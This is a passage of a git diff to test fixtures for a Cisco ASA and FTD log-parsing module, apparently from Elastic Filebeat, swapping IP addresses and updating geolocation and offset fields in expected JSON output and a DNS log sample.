+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 50120,
         "source.user.domain": "domain",
         "source.user.name": "USER001",
@@ -4456,13 +4394,6 @@
         "cisco.asa.termination_initiator": "OUTSIDE",
         "cisco.asa.termination_user": "domain\\USER001",
         "destination.address": "40.0.0.1",
-        "destination.as.number": 4249,
-        "destination.as.organization.name": "Eli Lilly and Company",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "40.0.0.1",
         "destination.port": 443,
         "event.action": "flow-expiration",
@@ -4475,7 +4406,7 @@
         "event.end": "2021-01-15T19:12:37.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:81.0.0.1/50120(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\\USER001)",
+        "event.original": "%ASA-6-302014: Teardown TCP connection 261246338 for OUTSIDE:89.160.20.156/50120(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 duration 0:02:05 bytes 9610 TCP FINs from OUTSIDE (domain\\USER001)",
         "event.reason": "TCP FINs",
         "event.severity": 6,
         "event.start": "2021-01-15T21:10:32.000Z",
@@ -4488,9 +4419,9 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 12842,
+        "log.offset": 12919,
         "network.bytes": 9610,
-        "network.community_id": "1:Wki7xXtyiCACPfXpHuQV+NLf33o=",
+        "network.community_id": "1:G4ALpkc+kkJFzBlSGnNhTyQjj5c=",
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "OUTSIDE",
@@ -4503,24 +4434,24 @@
         ],
         "related.ip": [
             "40.0.0.1",
-            "81.0.0.1"
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 50120,
         "source.user.domain": "domain",
         "source.user.name": "USER001",
@@ -4535,7 +4466,7 @@
         "cisco.asa.destination_interface": "INSIDE",
         "cisco.asa.mapped_destination_ip": "192.168.0.1",
         "cisco.asa.mapped_destination_port": 53,
-        "cisco.asa.mapped_source_ip": "82.0.0.1",
+        "cisco.asa.mapped_source_ip": "67.43.156.13",
         "cisco.asa.mapped_source_port": 63790,
         "cisco.asa.message_id": "302015",
         "cisco.asa.source_interface": "OUTSIDE",
@@ -4552,7 +4483,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:81.0.0.1/63790 (82.0.0.1/63790)(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\\USER001)",
+        "event.original": "%ASA-6-302015: Built inbound UDP connection 261311655 for OUTSIDE:89.160.20.156/63790 (67.43.156.13/63790)(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 (192.168.0.1/53) (domain\\USER001)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4562,8 +4493,8 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 13053,
-        "network.community_id": "1:BIxqdLncXeXXZrNudh3yrj2zmZc=",
+        "log.offset": 13135,
+        "network.community_id": "1:4sghryHbfd+vkUilwrakMfDSXPg=",
         "network.direction": "inbound",
         "network.iana_number": 17,
         "network.transport": "udp",
@@ -4577,26 +4508,26 @@
         ],
         "related.ip": [
             "192.168.0.1",
-            "81.0.0.1",
-            "82.0.0.1"
+            "67.43.156.13",
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
-        "source.nat.ip": "82.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
+        "source.nat.ip": "67.43.156.13",
         "source.port": 63790,
         "source.user.domain": "domain",
         "source.user.name": "USER001",
@@ -4626,7 +4557,7 @@
         "event.end": "2021-01-15T19:12:37.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:81.0.0.1/63790(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\\USER001)",
+        "event.original": "%ASA-6-302016: Teardown UDP connection 261311655 for OUTSIDE:89.160.20.156/63790(LOCAL\\domain\\USER001) to INSIDE:192.168.0.1/53 duration 0:00:00 bytes 139 (domain\\USER001)",
         "event.severity": 6,
         "event.start": "2021-01-15T21:12:37.000Z",
         "event.timezone": "-02:00",
@@ -4638,9 +4569,9 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 13254,
+        "log.offset": 13345,
         "network.bytes": 139,
-        "network.community_id": "1:BIxqdLncXeXXZrNudh3yrj2zmZc=",
+        "network.community_id": "1:4sghryHbfd+vkUilwrakMfDSXPg=",
         "network.iana_number": 17,
         "network.transport": "udp",
         "observer.egress.interface.name": "INSIDE",
@@ -4653,24 +4584,24 @@
         ],
         "related.ip": [
             "192.168.0.1",
-            "81.0.0.1"
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 63790,
         "source.user.domain": "domain",
         "source.user.name": "USER001",
@@ -4685,20 +4616,13 @@
         "cisco.asa.destination_interface": "OUTSIDE",
         "cisco.asa.mapped_destination_ip": "40.0.0.1",
         "cisco.asa.mapped_destination_port": 443,
-        "cisco.asa.mapped_source_ip": "82.0.0.1",
+        "cisco.asa.mapped_source_ip": "67.43.156.13",
         "cisco.asa.mapped_source_port": 50120,
         "cisco.asa.message_id": "302013",
         "cisco.asa.source_interface": "OUTSIDE",
         "cisco.asa.source_username": "LOCAL\\domain\\USER001",
         "cisco.asa.termination_user": "domain\\USER001",
         "destination.address": "40.0.0.1",
-        "destination.as.number": 4249,
-        "destination.as.organization.name": "Eli Lilly and Company",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "40.0.0.1",
         "destination.port": 443,
         "event.action": "firewall-rule",
@@ -4709,7 +4633,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:81.0.0.1/50120 (82.0.0.1/50120)(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\\USER001)",
+        "event.original": "%ASA-6-302013: Built inbound TCP connection 261246338 for OUTSIDE:89.160.20.156/50120 (67.43.156.13/50120)(LOCAL\\domain\\USER001) to OUTSIDE:40.0.0.1/443 (40.0.0.1/443) (domain\\USER001)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4719,8 +4643,8 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 13443,
-        "network.community_id": "1:Wki7xXtyiCACPfXpHuQV+NLf33o=",
+        "log.offset": 13539,
+        "network.community_id": "1:G4ALpkc+kkJFzBlSGnNhTyQjj5c=",
         "network.direction": "inbound",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -4734,26 +4658,26 @@
         ],
         "related.ip": [
             "40.0.0.1",
-            "81.0.0.1",
-            "82.0.0.1"
+            "67.43.156.13",
+            "89.160.20.156"
         ],
         "related.user": [
             "USER001"
         ],
         "service.type": "cisco",
-        "source.address": "81.0.0.1",
-        "source.as.number": 15704,
-        "source.as.organization.name": "Xtra Telecom S.A.",
-        "source.geo.city_name": "Madrid",
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.4143,
-        "source.geo.location.lon": -3.7016,
-        "source.geo.region_iso_code": "ES-M",
-        "source.geo.region_name": "Madrid",
-        "source.ip": "81.0.0.1",
-        "source.nat.ip": "82.0.0.1",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
+        "source.nat.ip": "67.43.156.13",
         "source.port": 50120,
         "source.user.domain": "domain",
         "source.user.name": "USER001",
@@ -4766,15 +4690,8 @@
         "@timestamp": "2021-07-29T08:35:29.000-02:00",
         "cisco.asa.message_id": "602304",
         "cisco.asa.tunnel_type": "LAN-to-LAN",
-        "destination.address": "12.12.12.12",
-        "destination.as.number": 32328,
-        "destination.as.organization.name": "Alascom, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "12.12.12.12",
+        "destination.address": "81.2.69.1452",
+        "destination.domain": "81.2.69.1452",
         "event.action": "deleted",
         "event.category": [
             "network"
@@ -4783,7 +4700,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 12.12.12.12 and 12.12.12.12 (user= 12.12.12.12) has been deleted.",
+        "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xABCXYZ) between 81.2.69.1452 and 81.2.69.1452 (user= 81.2.69.1452) has been deleted.",
         "event.outcome": "success",
         "event.severity": 6,
         "event.timezone": "-02:00",
@@ -4797,32 +4714,25 @@
         "input.type": "log",
         "log.file.path": "sample.log",
         "log.level": "informational",
-        "log.offset": 13641,
+        "log.offset": 13746,
         "network.direction": "outbound",
         "network.type": "ipsec",
         "observer.product": "asa",
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
-        "related.ip": [
-            "12.12.12.12"
+        "related.hosts": [
+            "81.2.69.1452"
         ],
         "related.user": [
-            "12.12.12.12"
+            "81.2.69.1452"
         ],
         "service.type": "cisco",
-        "source.address": "12.12.12.12",
-        "source.as.number": 32328,
-        "source.as.organization.name": "Alascom, Inc.",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "12.12.12.12",
+        "source.address": "81.2.69.1452",
+        "source.domain": "81.2.69.1452",
         "tags": [
             "cisco-asa",
             "forwarded"
         ],
-        "user.name": "12.12.12.12"
+        "user.name": "81.2.69.1452"
     }
 ]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/ftd/test/dns.log b/x-pack/filebeat/module/cisco/ftd/test/dns.log
index ce15fb2bdfab..ad54f0a5a64a 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/dns.log
+++ b/x-pack/filebeat/module/cisco/ftd/test/dns.log
@@ -1,21 +1,21 @@
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899
+2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299
 2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused
-2019-08-26T23:11:03Z siem-ftd  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure
